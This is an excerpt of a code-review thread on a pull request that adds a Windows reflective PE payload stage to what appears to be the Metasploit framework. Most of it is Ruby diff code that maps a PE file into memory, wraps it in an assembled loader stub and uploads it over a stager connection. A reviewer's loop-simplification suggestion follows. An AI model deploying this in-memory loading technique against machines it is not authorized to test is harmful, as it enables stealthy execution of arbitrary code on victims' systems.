lib/msf/core/payload/windows/reflective_pe.rb

```diff
@@ -0,0 +1,126 @@
+        },
+      ))
+      register_options(
+      [
+        OptPath.new('PE', [ true, "The local path to the PE file to upload" ]),
+      ], ReflectivePE)
+    end
+
+    #
+    # Returns the PE file path
+    #
+    def pe_path
+      datastore['PE']
+    end
+
+    #
+    # Transmits the reflective PE payload to the remote
+    # computer so that it can be loaded into memory.
+    #
+    def handle_connection(conn, opts = {})
+      data = ''
+      begin
+        File.open(pe_path, "rb") { |f|
+          data += f.read
+        }
+      rescue
+        print_error("Failed to load PE: #{$!}.")
+        # TODO: exception
+        conn.close
+        return
+      end
+      print_status('Premapping PE file...')
+      mapped_pe = create_pe_memory_map(data)
+      print_status("Mapped PE size #{mapped_pe.length}")
+      p = encapsulate_reflective_stub(mapped_pe)
+      print_status("Uploading reflective PE (#{p.length} bytes)...")
+      # Send the size of the thing we're transferring
+      conn.put([ p.length ].pack('V'))
+      # Send the image name + image
+      conn.put(p)
+      print_status("Upload completed.")
+      conn.close
+    end
+
+    def encapsulate_reflective_stub(mapped_pe)
+      call_size = mapped_pe.length+5
+      reflective_loader = Metasm::Shellcode.assemble(Metasm::X86.new, "cld\ncall $+#{call_size}").encode_string
+      reflective_loader += mapped_pe
+      reflective_loader += Metasm::Shellcode.assemble(Metasm::X86.new, asm_reflective_pe_loader).encode_string
+    end
+
+    def create_pe_memory_map(file)
+      pe = Rex::PeParsey::Pe.new(Rex::ImageSource::Memory.new(file))
+      unless pe.ptr_32?
+        raise ArgumentError, 'Selected PE file is not 32 bit'
+      end
+      # TODO: Add reflective CLR loading support
+      unless pe.hdr.opt['DataDirectory'][14].v['Size'] == 0
+        raise RuntimeError, 'PE files with CLR is not currently supported'
+      end
+      unless pe.hdr.opt['DataDirectory'][5].v['Size'] != 0
+        raise RuntimeError, 'PE file is missing relocation data'
+      end
+
+      pe_map = ''
+      offset = 0
+      virtual_offset = pe.image_base
+      vprint_status("ImageBase: 0x#{pe.image_base.to_s(16)}")
+      vprint_status("#{pe.sections.first.name} VMA: 0x#{(pe.image_base+pe.sections.first.vma).to_s(16)}")
+      vprint_status("#{pe.sections.first.name} Offset: 0x#{pe.sections.first.file_offset.to_s(16)}")
+      until offset == pe.sections.first.file_offset
+        pe_map << file[offset]
+        virtual_offset+=1
+        offset+=1
+      end
+
+      # Map PE sections
+      pe.sections.each do |sec|
+        until virtual_offset == sec.vma+pe.image_base do
+          pe_map << "\x00"
+          virtual_offset+=1
+        end
+        pe_map << sec.read(0,sec.raw_size)
+        virtual_offset += sec.raw_size
+        until virtual_offset >= (sec.vma+pe.image_base+sec.size)
+          pe_map << "\x00"
+          virtual_offset += 1
+        end
```

Comment:
Same thing here regarding the loop

```suggestion
        pe_map << "\x00" * ((sec.vma + pe.image_base + sec.size) - virtual_offset)
```